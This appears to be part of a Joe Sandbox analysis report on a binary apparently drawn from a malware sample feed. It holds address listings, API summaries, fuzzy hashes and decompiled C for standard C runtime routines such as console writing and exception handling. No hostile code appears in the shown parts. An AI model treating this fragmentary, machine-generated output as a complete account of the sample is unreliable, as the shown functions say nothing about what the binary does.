    0x001b6b0e
    0x001b6b11
    0x001b6b1a
    0x001b6b1e
    0x001b6b1f
    0x001b6b26
    0x001b6b2c
    0x001b6b34
    0x001b6b3f
    0x001b6b44
    0x001b6b4f
    0x001b6b54
    0x001b6b5a
    0x001b6b63
    0x001b6bbd
    0x001b6bbd
    0x001b6c48
    0x001b6c4d
    0x001b6c5f
    0x001b6c64
    0x001b6c67
    0x001b6c6c
    0x001b6c87
    0x001b6d6a
    0x001b6d70
    0x001b6c8d
    0x001b6c8d
    0x001b6c98
    0x001b6c9a
    0x001b6c9d
    0x001b6ca6
    0x001b6cb0
    0x00000000
    0x001b6cb2
    0x001b6cb4
    0x001b6cb6
    0x001b6ccf
    0x00000000
    0x001b6cd5
    0x001b6cd9
    0x001b6cdf
    0x001b6ce2
    0x001b6ce8
    0x001b6ceb
    0x00000000
    0x001b6ceb
    0x001b6cd9
    0x001b6ccf
    0x001b6cb0
    0x001b6ca6
    0x001b6c87
    0x001b6c6c
    0x001b6b5a
    0x001b6ad5
    0x001b6aab
    0x00000000
    0x001b6cee
    0x001b6cee
    0x001b6cf7
    0x001b6d72
    0x001b6d77
    0x001b6d7f
    0x001b6d80
    0x001b6d81
    0x001b6d8d
    0x00000000

    APIs
    • GetConsoleOutputCP.KERNEL32(33DA424A,?,00000000,?), ref: 001B6A24
      • Part of subcall function 001B5A29: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001B649D,?,00000000,-00000008), ref: 001B5AD5
    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001B6C7F
    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001B6CC7
    • GetLastError.KERNEL32 ref: 001B6D6A
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
    • String ID:
    • API String ID: 2112829910-0
    • Opcode ID: 9d69d8ba0a2772f0b0ecf5ac50020f9226da9fe7a00baac01034cad6405548fd
    • Instruction ID: d25c1e54e2ce3d45db6607a7f9634836a9eb800e59569c3fb9adb0fdea4021be
    • Opcode Fuzzy Hash: 9d69d8ba0a2772f0b0ecf5ac50020f9226da9fe7a00baac01034cad6405548fd
    • Instruction Fuzzy Hash: 13D15875E002589FCF15CFE8D880AEDBBB5FF19314F18452AE856EB251D734A942CB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E001B78AB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				signed int* _t52;
    				signed int _t53;
    				intOrPtr _t54;
    				signed int _t58;
    				signed int _t61;
    				intOrPtr _t71;
    				signed int _t75;
    				signed int _t79;
    				signed int _t81;
    				signed int _t84;
    				signed int _t85;
    				signed int _t97;
    				signed int* _t98;
    				signed char* _t101;
    				signed int _t107;
    				void* _t111;
    
    				_push(0x10);
    				_push(0x1c3388);
    				E001AD900(__ebx, __edi, __esi);
    				_t75 = 0;
    				_t52 =  *(_t111 + 0x10);
    				_t81 = _t52[1];
    				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
    					L30:
    					_t53 = 0;
    					__eflags = 0;
    					goto L31;
    				} else {
    					_t97 = _t52[2];
    					if(_t97 != 0 ||  *_t52 < 0) {
    						_t84 =  *_t52;
    						_t107 =  *(_t111 + 0xc);
    						if(_t84 >= 0) {
    							_t107 = _t107 + 0xc + _t97;
    						}
    						 *(_t111 - 4) = _t75;
    						_t101 =  *(_t111 + 0x14);
    						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
    							L10:
    							_t54 =  *((intOrPtr*)(_t111 + 8));
    							__eflags = _t84 & 0x00000008;
    							if((_t84 & 0x00000008) == 0) {
    								__eflags =  *_t101 & 0x00000001;
    								if(( *_t101 & 0x00000001) == 0) {
    									_t84 =  *(_t54 + 0x18);
    									__eflags = _t101[0x18] - _t75;
    									if(_t101[0x18] != _t75) {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												__eflags =  *_t101 & 0x00000004;
    												_t79 = 0;
    												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
    												__eflags = _t75;
    												 *(_t111 - 0x20) = _t75;
    												goto L29;
    											}
    										}
    									} else {
    										__eflags = _t84;
    										if(_t84 == 0) {
    											goto L32;
    										} else {
    											__eflags = _t107;
    											if(_t107 == 0) {
    												goto L32;
    											} else {
    												E001AF6B0(_t107, E001ADD40(_t84,  &(_t101[8])), _t101[0x14]);
    												goto L29;
    											}
    										}
    									}
    								} else {
    									__eflags =  *(_t54 + 0x18);
    									if( *(_t54 + 0x18) == 0) {
    										goto L32;
    									} else {
    										__eflags = _t107;
    										if(_t107 == 0) {
    											goto L32;
    										} else {
    											E001AF6B0(_t107,  *(_t54 + 0x18), _t101[0x14]);
    											__eflags = _t101[0x14] - 4;
    											if(_t101[0x14] == 4) {
    												__eflags =  *_t107;
    												if( *_t107 != 0) {
    													_push( &(_t101[8]));
    													_push( *_t107);
    													goto L21;
    												}
    											}
    											goto L29;
    										}
    									}
    								}
    							} else {
    								_t84 =  *(_t54 + 0x18);
    								goto L12;
    							}
    						} else {
    							_t71 =  *0x1c5dcc; // 0x0
    							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
    							if(_t71 == 0) {
    								goto L10;
    							} else {
    								 *0x1c7000();
    								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
    								L12:
    								if(_t84 == 0 || _t107 == 0) {
    									L32:
    									E001B1BDC(_t75, _t84, _t97, _t101, _t107);
    									asm("int3");
    									_push(8);
    									_push(0x1c33a8);
    									E001AD900(_t75, _t101, _t107);
    									_t98 =  *(_t111 + 0x10);
    									_t85 =  *(_t111 + 0xc);
    									__eflags =  *_t98;
    									if(__eflags >= 0) {
    										_t103 = _t85 + 0xc + _t98[2];
    										__eflags = _t85 + 0xc + _t98[2];
    									} else {
    										_t103 = _t85;
    									}
    									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
    									_t108 =  *(_t111 + 0x14);
    									_push( *(_t111 + 0x14));
    									_push(_t98);
    									_push(_t85);
    									_t77 =  *((intOrPtr*)(_t111 + 8));
    									_push( *((intOrPtr*)(_t111 + 8)));
    									_t58 = E001B78AB(_t77, _t103, _t108, __eflags) - 1;
    									__eflags = _t58;
    									if(_t58 == 0) {
    										_t61 = E001B733D(_t103, _t108[0x18], E001ADD40( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
    									} else {
    										_t61 = _t58 - 1;
    										__eflags = _t61;
    										if(_t61 == 0) {
    											_t61 = E001B734D(_t103, _t108[0x18], E001ADD40( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
    										}
    									}
    									 *(_t111 - 4) = 0xfffffffe;
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t61;
    								} else {
    									 *_t107 = _t84;
    									_push( &(_t101[8]));
    									_push(_t84);
    									L21:
    									 *_t107 = E001ADD40();
    									L29:
    									 *(_t111 - 4) = 0xfffffffe;
    									_t53 = _t75;
    									L31:
    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
    									return _t53;
    								}
    							}
    						}
    					} else {
    						goto L30;
    					}
    				}
    			}



















    0x001b78ab
    0x001b78ad
    0x001b78b2
    0x001b78b7
    0x001b78b9
    0x001b78bc
    0x001b78c1
    0x001b79d1
    0x001b79d1
    0x001b79d1
    0x00000000
    0x001b78d0
    0x001b78d0
    0x001b78d5
    0x001b78df
    0x001b78e1
    0x001b78e6
    0x001b78eb
    0x001b78eb
    0x001b78ed
    0x001b78f0
    0x001b78f5
    0x001b7917
    0x001b7917
    0x001b791a
    0x001b791d
    0x001b793b
    0x001b793e
    0x001b797d
    0x001b7980
    0x001b7983
    0x001b79a8
    0x001b79aa
    0x00000000
    0x001b79ac
    0x001b79ac
    0x001b79ae
    0x00000000
    0x001b79b0
    0x001b79b0
    0x001b79b5
    0x001b79b9
    0x001b79b9
    0x001b79ba
    0x00000000
    0x001b79ba
    0x001b79ae
    0x001b7985
    0x001b7985
    0x001b7987
    0x00000000
    0x001b7989
    0x001b7989
    0x001b798b
    0x00000000
    0x001b798d
    0x001b799e
    0x00000000
    0x001b79a3
    0x001b798b
    0x001b7987
    0x001b7940
    0x001b7940
    0x001b7944
    0x00000000
    0x001b794a
    0x001b794a
    0x001b794c
    0x00000000
    0x001b7952
    0x001b7959
    0x001b7961
    0x001b7965
    0x001b7967
    0x001b796a
    0x001b796f
    0x001b7970
    0x00000000
    0x001b7970
    0x001b796a
    0x00000000
    0x001b7965
    0x001b794c
    0x001b7944
    0x001b791f
    0x001b791f
    0x00000000
    0x001b791f
    0x001b78fc
    0x001b78fc
    0x001b7901
    0x001b7906
    0x00000000
    0x001b7908
    0x001b790a
    0x001b7913
    0x001b7922
    0x001b7924
    0x001b79e3
    0x001b79e3
    0x001b79e8
    0x001b79e9
    0x001b79eb
    0x001b79f0
    0x001b79f5
    0x001b79f8
    0x001b79fb
    0x001b79fe
    0x001b7a07
    0x001b7a07
    0x001b7a00
    0x001b7a00
    0x001b7a00
    0x001b7a0a
    0x001b7a0e
    0x001b7a11
    0x001b7a12
    0x001b7a13
    0x001b7a14
    0x001b7a17
    0x001b7a20
    0x001b7a20
    0x001b7a23
    0x001b7a59
    0x001b7a25
    0x001b7a25
    0x001b7a25
    0x001b7a28
    0x001b7a3f
    0x001b7a3f
    0x001b7a28
    0x001b7a5e
    0x001b7a68
    0x001b7a74
    0x001b7932
    0x001b7932
    0x001b7937
    0x001b7938
    0x001b7972
    0x001b7979
    0x001b79bd
    0x001b79bd
    0x001b79c4
    0x001b79d3
    0x001b79d6
    0x001b79e2
    0x001b79e2
    0x001b7924
    0x001b7906
    0x00000000
    0x00000000
    0x00000000
    0x001b78d5

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: AdjustPointer
    • String ID:
    • API String ID: 1740715915-0
    • Opcode ID: f5d3fb7e256501609351caed3f90d8d31eda9f96b22642cb3b031d0a8010c3eb
    • Instruction ID: 5c164dc8db0dd57319a19690db3a12ee208eaa7efb7922b623d5157d80461b71
    • Opcode Fuzzy Hash: f5d3fb7e256501609351caed3f90d8d31eda9f96b22642cb3b031d0a8010c3eb
    • Instruction Fuzzy Hash: 00511272608202AFDB298F50D841BFE77A5FF90724F14442DE8468B6D1E731ED40DB90
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ColorObjectSelect$Text
    • String ID:
    • API String ID: 2688426544-0
    • Opcode ID: 80b59a929da4ec1f092b1090aef60dc87d4fad5aeffb1f250beefac6d21e0ded
    • Instruction ID: cc230573b68476b63571b5e88b039f8c6655ac8c77270483f690832f5f0d44aa
    • Opcode Fuzzy Hash: 80b59a929da4ec1f092b1090aef60dc87d4fad5aeffb1f250beefac6d21e0ded
    • Instruction Fuzzy Hash: CD519478A04208EFCB04DF68C598AACBBF1FF49314F15846DE8899B352DB31E981DB41
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E001B8F6D(void* _a4, long _a8, DWORD* _a12) {
    				void* _t13;
    
    				_t13 = WriteConsoleW( *0x1c48b0, _a4, _a8, _a12, 0);
    				if(_t13 == 0 && GetLastError() == 6) {
    					E001B8FE1();
    					E001B8FC2();
    					_t13 = WriteConsoleW( *0x1c48b0, _a4, _a8, _a12, _t13);
    				}
    				return _t13;
    			}




    0x001b8f8a
    0x001b8f8e
    0x001b8f9b
    0x001b8fa0
    0x001b8fbb
    0x001b8fbb
    0x001b8fc1

    APIs
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,001B8AD2,?,00000001,?,?,?,001B6DBE,?,?,00000000), ref: 001B8F84
    • GetLastError.KERNEL32(?,001B8AD2,?,00000001,?,?,?,001B6DBE,?,?,00000000,?,?,?,001B6709,?), ref: 001B8F90
      • Part of subcall function 001B8FE1: CloseHandle.KERNEL32(FFFFFFFE,001B8FA0,?,001B8AD2,?,00000001,?,?,?,001B6DBE,?,?,00000000,?,?), ref: 001B8FF1
    • ___initconout.LIBCMT ref: 001B8FA0
      • Part of subcall function 001B8FC2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B8F5E,001B8ABF,?,?,001B6DBE,?,?,00000000,?), ref: 001B8FD5
    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,001B8AD2,?,00000001,?,?,?,001B6DBE,?,?,00000000,?), ref: 001B8FB5
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
    • String ID:
    • API String ID: 2744216297-0
    • Opcode ID: f3b01c42e9531fbc5cf23350c6e23174c26add272ad9dc68509895dd72ff601b
    • Instruction ID: 119eeba0d6ffd09fecfebff7ad7acafe3fcb2c2c479c6e669aea6b3347721881
    • Opcode Fuzzy Hash: f3b01c42e9531fbc5cf23350c6e23174c26add272ad9dc68509895dd72ff601b
    • Instruction Fuzzy Hash: 4FF01C36140164BBCF222FD5EC08DE97F6AFB097A1B004014FE0986571CB32CC60EB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: _strlen
    • String ID: (
    • API String ID: 4218353326-3887548279
    • Opcode ID: 1fde69d4ba4e82fbc1b489a49b6b3f2aef78716e35069673ad783f560d1d8dc6
    • Instruction ID: 1c078065192d79f1c54e6d6c7999b3ad5aaeae46f616b92c2133e7db4f7a287b
    • Opcode Fuzzy Hash: 1fde69d4ba4e82fbc1b489a49b6b3f2aef78716e35069673ad783f560d1d8dc6
    • Instruction Fuzzy Hash: 51510675904209ABCB15DF58C882BADBBF0FF44314F08C969E8A9DB390D334EA95CB45
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 47%
    			E001B771B(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t37;
    				signed int _t46;
    				void* _t52;
    				void* _t54;
    				signed int* _t55;
    				void* _t58;
    				void* _t59;
    				void* _t61;
    				intOrPtr* _t63;
    
    				E001B20D7(_a12);
    				_pop(_t54);
    				_t37 = E001B1C6E(_t52, _t54, __edx, _t59, _t61);
    				_t55 = _a20;
    				_t58 = _a4;
    				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
    					if(( *(_t58 + 4) & 0x00000066) == 0) {
    						if(_t55[3] != 0) {
    							L14:
    							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
    								L19:
    								E001B7A82(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
    								goto L20;
    							} else {
    								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
    								if(_t63 == 0) {
    									goto L19;
    								}
    								 *0x1c7000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
    								return  *_t63();
    							}
    						}
    						_t46 =  *_t55 & 0x1fffffff;
    						if(_t46 < 0x19930521 || _t55[7] == 0) {
    							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
    								goto L20;
    							} else {
    								goto L14;
    							}
    						} else {
    							goto L14;
    						}
    					}
    					if(_t55[1] != 0 && _a24 == 0) {
    						L001B731A(_a8, _a16, _t55);
    					}
    					goto L20;
    				} else {
    					L20:
    					return 1;
    				}
    			}
















    0x001b7724
    0x001b7729
    0x001b772a
    0x001b772f
    0x001b7734
    0x001b7744
    0x001b776c
    0x001b7797
    0x001b77b7
    0x001b77bd
    0x001b77f9
    0x001b780d
    0x00000000
    0x001b77ca
    0x001b77cd
    0x001b77d2
    0x00000000
    0x00000000
    0x001b77ec
    0x00000000
    0x001b77f4
    0x001b77bd
    0x001b779b
    0x001b77a2
    0x001b77ab
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001b77a2
    0x001b7771
    0x001b7787
    0x001b778c
    0x00000000
    0x001b7815
    0x001b7815
    0x00000000
    0x001b7817

    APIs
    • ___except_validate_context_record.LIBVCRUNTIME ref: 001B7724
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ___except_validate_context_record
    • String ID: csm$csm
    • API String ID: 3493665558-3733052814
    • Opcode ID: 3d45532924c616828b8b95bf36dcb27bd78c0ac1b1a3de91fe2e8c3b410b996d
    • Instruction ID: badf7df6dfd49ca913f1f0e428f7cf2d334ce2cb9d95074ea7dafb678120621f
    • Opcode Fuzzy Hash: 3d45532924c616828b8b95bf36dcb27bd78c0ac1b1a3de91fe2e8c3b410b996d
    • Instruction Fuzzy Hash: 37314632408205EBCF269F51DC488EE7B66FF88315B188A5AFC14492A1C732CCA1DF91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: EnumFamiliesFont
    • String ID: 1$\
    • API String ID: 2229041460-1239263948
    • Opcode ID: 2bb565df0993e88687f746d65e97da0b9e12119b327016b435585f529d199712
    • Instruction ID: af0bffe7ebda23281a89a360e80dd925246255723e27d2b1eebdbb401f5da1cd
    • Opcode Fuzzy Hash: 2bb565df0993e88687f746d65e97da0b9e12119b327016b435585f529d199712
    • Instruction Fuzzy Hash: 61416E78A04208DFDB14DF58C084AAABBF0FF49354F15C46EE8898B362D775A985CB91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ErrorFileLastWrite
    • String ID: write failed: %lu
    • API String ID: 442123175-171016427
    • Opcode ID: 2b56cc4d8b015f59f60832091a1ab7e69cd44d19eeb6f212f7ad36cf27e8ddb9
    • Instruction ID: 72c4583087e370cfb116c5dc9e1670fe997d821653d9582940dc72fd252c6b67
    • Opcode Fuzzy Hash: 2b56cc4d8b015f59f60832091a1ab7e69cd44d19eeb6f212f7ad36cf27e8ddb9
    • Instruction Fuzzy Hash: 19310BB45083459FCB00EF18C888B9E7BE5FF44354F018A69F8998B391D370DA94CB82
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ErrorFileLastWrite
    • String ID: write failed: %lu
    • API String ID: 442123175-171016427
    • Opcode ID: 66ae816b0724a25effe3980b4301589d6df8046c65e04039190f927aa89e13ea
    • Instruction ID: 0117ce3f43025b7e5e800556d6137d3f823fc160c4d854c283a5035118694db6
    • Opcode Fuzzy Hash: 66ae816b0724a25effe3980b4301589d6df8046c65e04039190f927aa89e13ea
    • Instruction Fuzzy Hash: 5D115B744083049FC700EF5CC488B9A7BE5EF04360F018669E89D8B392D770DAC8CB82
    Uniqueness

    Uniqueness Score: -1.00%